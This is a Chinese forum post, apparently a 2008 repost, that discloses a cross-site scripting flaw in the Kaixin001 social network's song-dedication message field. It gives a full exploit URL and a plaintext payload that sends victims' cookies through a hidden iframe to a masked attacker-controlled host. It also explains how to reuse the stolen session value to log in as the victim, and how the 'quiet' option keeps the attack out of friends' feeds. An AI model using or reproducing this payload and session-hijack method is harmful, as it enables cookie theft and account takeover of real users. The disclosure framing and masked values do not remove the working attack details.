老文章(2008-12-11 19:11),但仍有学习价值,遂转发……
2008.9.25,我公布"国内邮箱系统爆发大规模跨站漏洞"后,FireF0X就和我说,什么时候弄个XSS的主题写写,让大家也一起讨论一下。说来惭愧,也一直没写什么东西,这次在"火狐"公布"Kaixin001.comXSS漏洞",也算是给他有个交代吧。
开心网是一个在线社区,通过它您可以与朋友、同学、同事、家人保持更紧密的联系,及时了解他们的动态;与他们分享你的照片、心情、快乐。
漏洞描述:
开心网(www.kaixin001.com),当你在给好友点歌时,你可以留言,而开心对用户留言的数据没有进行严格过滤,导致攻击者可以提交恶意代码,进行跨站攻击。攻击者利用该漏洞可以盗取开心网用户的cookie,然后利用Cookie欺骗冒充该用户进行账号登录。危害严重。
代码利用:
http://www.kaixin001.com/music/ordermusic.php?verify=××××_1006_××××_1228989163_×××××&musicid=32331139&musichost=×××××&mid=924962&orderuids=×××××&word=%3Cimg+src%3D%22x%22+onerror%3D%22document.write%28%27%3Ciframe+src%3Dhttp%3A%2F%2Fwww.×××××.com%2Fxss%2Fxsscu.asp%3F%27%2Bescape%28document.cookie%29%2B%27+width%3D0++height%3D0++border%3D0%3E%3C%2Fiframe%3E%27%29%22%3E%0D%0A&group=&quiet=1
verify参数作用是验证用户身份
musicid参数是给好友点播歌曲的ID号
musichost是自己的开心网ID
orderuids是好友开心网ID
word是点歌时留言内容
group 用户组
quiet 悄悄地(将不会出现在好友的动态中)
word参数后可以加入精心构造的跨站代码。
盗取Cookie提交代码:<img src="x" onerror="document.write('<iframesrc=http://www.×××.com/xss/xsscu.asp?'+escape(document.cookie)+' width=0 height=0 border=0></iframe>')">
这段明文盗取COOKIE代码,你要转化为URL编码后再提交。
当点歌成功后,恶意代码将以系统消息的形式,发送给受害者。系统会告诉受害者,你的朋友×××给你点了一首歌。
开心网的COOKIE(其实是Session)格式如下:
SERVERID=_srv102-125_;
_user=3b45065b00978846edecd20e6dae7710_×××××_1226381918;
_email=×××××%40126.com; _invisible=0。
你只要把_user中的参数替换掉,就可以利用受害者的帐号进行登录了。
附图一张:用SESSIONIE,来收取开心COOKIE。
PS:敏感数据我用××××代替了,这个漏洞是首发,希望大家不要拿它做什么坏事哦,希望大家多多交流,火狐越来越好。